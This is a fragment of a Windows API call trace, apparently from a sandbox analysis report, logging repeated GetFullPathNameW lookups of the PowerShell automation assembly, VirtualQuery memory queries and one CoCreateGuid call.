	[0396.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.669] VirtualQuery (in: lpAddress=0x16b680, lpBuffer=0x16c540, dwLength=0x30 | out: lpBuffer=0x16c540*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.670] VirtualQuery (in: lpAddress=0x16b710, lpBuffer=0x16c5d0, dwLength=0x30 | out: lpBuffer=0x16c5d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.671] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.672] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.673] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.674] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.675] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.677] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.677] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.677] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.677] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.677] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.678] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.678] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.678] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.678] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.678] VirtualQuery (in: lpAddress=0x16bac0, lpBuffer=0x16c980, dwLength=0x30 | out: lpBuffer=0x16c980*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.678] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.679] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.679] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.679] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.679] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x32b502aa, Data2=0x7f23, Data3=0x421c, Data4=([0]=0x9e, [1]=0xe1, [2]=0xd9, [3]=0x8d, [4]=0x2d, [5]=0xe8, [6]=0x20, [7]=0x1f))) returned 0x0
	[0396.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.684] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.685] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
